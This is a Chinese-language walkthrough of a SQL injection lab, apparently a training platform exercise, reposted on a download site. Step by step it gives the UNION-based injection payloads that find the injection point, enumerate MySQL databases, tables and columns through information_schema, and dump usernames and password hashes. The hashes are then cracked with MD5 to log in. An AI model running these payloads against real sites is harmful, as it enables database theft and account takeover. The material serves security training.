80、SQL手工注入漏洞测试(MySQL数据库)
时间:2022-03-16 11:45
原文引用
访问网页,进入登陆下方的滚动公告,进行测试注入点
?id=1 and 1=1返回正常,?id=1 and 1=2 返回错误,说明有注入点。
?id=1 order by 5查询列数。一直减少,直到页面返回正常
?id=1 and 1=2 union select 1,version(),database(),4查询版本和数据库名称
(此时知道数据库为mozhe_Discuz_StormGroup)
?id=1 and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 0,1查询数据库,使用limit0,1表示从第0行开始取1行数据。
?id=1 and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1查询数据库,使用limit 1,1表示从第1行开始取1行数据。
?id=1 and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 2,1查询数据库,使用limit 2,1表示从第2行开始取1行数据。
?id=1 and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 3,1查询数据库,使用limit 3,1表示从第3行开始取1行数据。
?id=1 and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 4,1查询数据库,使用limit 4,1表示从第4行开始取1行数据。
?id=1 and 1=2 union select 1,table_name,3,4 from information_schema.tables where table_schema=’mozhe_Discuz_StormGroup’ limit 0,1查询mozhe_Discuz_StormGroup的数据库的表的名字,从第0行取一行数据
(此时知道数据库为表为StromGroup_member)
?id=1 and 1=2 union select 1,table_name,3,4 from information_schema.tables where table_schema=’mozhe_Discuz_StormGroup’ limit 1,1查询mozhe_Discuz_StormGroup的数据库的表的名字,从第1行取一行数据
?id=1 and 1=2 union select 1,table_name,3,4 from information_schema.tables where table_schema=’mozhe_Discuz_StormGroup’ limit 2,1查询mozhe_Discuz_StormGroup的数据库的表的名字,从第2行取一行数据,返回错误,说明只有2个表。
?id=1 and 1=2 union select 1,column_name,column_type,4 from information_schema.columns where table_name=’StormGroup_member’ limit 0,1查询StormGroup_member的表的字段内容,从第0行取一行数据
?id=1 and 1=2 union select 1,column_name,column_type,4 from information_schema.columns where table_name=’StormGroup_member’ limit 1,1查询StormGroup_member的表的字段内容,从第1行取一行数据
?id=1 and 1=2 union select 1,column_name,column_type,4 from information_schema.columns where table_name=’StormGroup_member’ limit 2,1查询StormGroup_member的表的字段内容,从第2行取一行数据
?id=1 and 1=2 union select 1,column_name,column_type,4 from information_schema.columns where table_name=’StormGroup_member’ limit 3,1查询StormGroup_member的表的字段内容,从第3行取一行数据
?id=1 and 1=2 union select 1,concat(name,’-‘,password,’-‘,status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1获取第0行值
?id=1 and 1=2 union select 1,concat(name,’-‘,password,’-‘,status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 1,1获取第1行值
md5解密,登陆得到key。
本类排行
今日推荐
-
逗拍56个民族服装特效模板免费版
版本:11.6.0
大小:105.33MB
日期:2024-04-27
-
甜美证件照正式版
版本:1.1.2
大小:60.41MB
日期:2024-04-27
-
复古老照片滤镜免费版
版本:1.0
大小:65.46MB
日期:2024-04-27
-
柠萌相机官方版
版本:1.0.0
大小:22.60MB
日期:2024-04-27
-
玩美修图照相机新版
版本:8081.18.12.12
大小:28.26MB
日期:2024-04-27
-
智邦国际ERP系统官方版
版本:v3206.001
大小:28.96MB
日期:2024-04-27
热门手游
-
硬卡车司机模拟器完整版
版本:v3.3.0
大小:169.5M
日期:2024-04-27
-
RiderSkills骑手技能正式版
版本:v1.3.0
大小:85.1M
日期:2024-04-27
-
QQ飞车新版
版本:v4.7.1.3029701
大小:33.6M
日期:2024-04-27
-
Wheelie Life2官方版
版本:v1.5
大小:104.7M
日期:2024-04-27
-
疯狂赛车竞技新版
版本:v1.0.1
大小:96.7M
日期:2024-04-27
-
仙域奇侠传正版
版本:1.0
大小:2.26MB
日期:2024-04-27